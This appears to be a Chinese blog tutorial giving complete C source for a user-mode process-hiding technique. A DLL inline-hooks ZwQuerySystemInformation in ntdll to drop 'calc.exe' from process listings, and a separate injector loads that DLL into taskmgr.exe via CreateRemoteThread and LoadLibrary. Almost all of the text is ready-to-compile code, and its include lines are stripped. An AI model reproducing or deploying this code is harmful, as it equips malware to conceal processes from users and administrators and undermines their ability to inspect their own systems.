hook步骤:
查找目标函数地址
修改目标函数第一条指令跳转到我们构造的函数
卸载掉钩子,执行正常的目标函数
过滤掉特定信息后返回
hook代码如下
#include#includeBOOL hook_code();BOOL unHook_code();NTSTATUS WINAPI NewZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength);char StroneDate[5]={0x00,0x00,0x00,0x00,0x00,};//备份原始字节DWORD OldProtect;//原始页保护属性DWORD dwAddress;//跳转偏移地址FARPROC procaddr;DWORD num;byte pBuf[5]={0xE9,0xFF,0xFF,0xFF,0xFF};typedef NTSTATUS (WINAPI * ZwQuerySystemInformation) (SYSTEM_INFORMATION_CLASS SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength);BOOL WINAPI DllMain(HMODULE hModule,DWORD call,LPVOID lpreserved){hook_code();return true;}BOOL hook_code(){procaddr = (FARPROC)GetProcAddress(GetModuleHandleA("ntdll.dll"),"ZwQuerySystemInformation");//获取函数地址VirtualProtect(procaddr,5,PAGE_EXECUTE_READWRITE,&OldProtect);//修改页保护属性if(!StroneDate[0]){memcpy(StroneDate,procaddr,5);}//备份原始指令dwAddress = (DWORD)NewZwQuerySystemInformation -(DWORD) procaddr -5;//计算函数偏移 memcpy(&(pBuf[1]),&dwAddress,4);//精准偏移memcpy(procaddr,pBuf,5);VirtualProtect(procaddr,5,OldProtect,&OldProtect);return TRUE;}BOOL unHook_code(){VirtualProtect(procaddr,5,PAGE_EXECUTE_READWRITE,&OldProtect);memcpy(procaddr,StroneDate,5);VirtualProtect(procaddr,5,OldProtect,&OldProtect);return TRUE;}NTSTATUS WINAPI NewZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength){unHook_code();NTSTATUS status = ((ZwQuerySystemInformation)procaddr)(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);PSYSTEM_PROCESS_INFORMATION pcurr = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;PSYSTEM_PROCESS_INFORMATION plast =NULL;//last nodeif(SystemInformationClass == 5){while(TRUE){if((PWSTR)pcurr->Reserved2[1] != NULL)//ImageName{if(0 == memcmp(pcurr->Reserved2[1],L"calc.exe",4)){if(pcurr->NextEntryOffset == 0)plast->NextEntryOffset = 0;elseplast->NextEntryOffset += pcurr->NextEntryOffset;}elseplast = pcurr;}if(pcurr->NextEntryOffset == 0)break;pcurr = (PSYSTEM_PROCESS_INFORMATION)((ULONG)pcurr + pcurr->NextEntryOffset);}}hook_code();return status;}
使用远线程注入,将hookdll注入到任务管理器
#include#include#include#define PATH "C:\\Users\\john\\Desktop\\hookdll.dll"//要注入的dll绝对路径BOOL EnumProcess();BOOL Inject(DWORD);DWORD dwPID;void main(){if(EnumProcess()){Inject(dwPID);}}BOOL EnumProcess(){PROCESSENTRY32 pe32 = {0};pe32.dwSize = sizeof(PROCESSENTRY32);HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);//拍进程快照if (INVALID_HANDLE_VALUE == hProcessSnap){printf("CreateToolhelp32Snapshot Error :%d",GetLastError());}BOOL Ret = Process32First(hProcessSnap,&pe32);//枚举快照while(Ret){int i = strcmp("taskmgr.exe",pe32.szExeFile);if(!i){ dwPID = pe32.th32ProcessID;return TRUE;}Ret = Process32Next(hProcessSnap,&pe32);//下一进程信息}return FALSE;}BOOL Inject(DWORD dwPID){HANDLE hand = OpenProcess(PROCESS_ALL_ACCESS,NULL,dwPID);LPVOID lpaddress = VirtualAllocEx(hand,NULL,0x1000,MEM_COMMIT,PAGE_EXECUTE_READWRITE);//申请指定大小内存,分配读写执行权限bool write = WriteProcessMemory(hand,lpaddress,PATH,0x1000,NULL);//实现注入CreateRemoteThread(hand,NULL,NULL,(LPTHREAD_START_ROUTINE)LoadLibrary,lpaddress,NULL,NULL);//创建线程执行dllreturn TRUE;}
效果图如下:
京公网安备 11010802041100号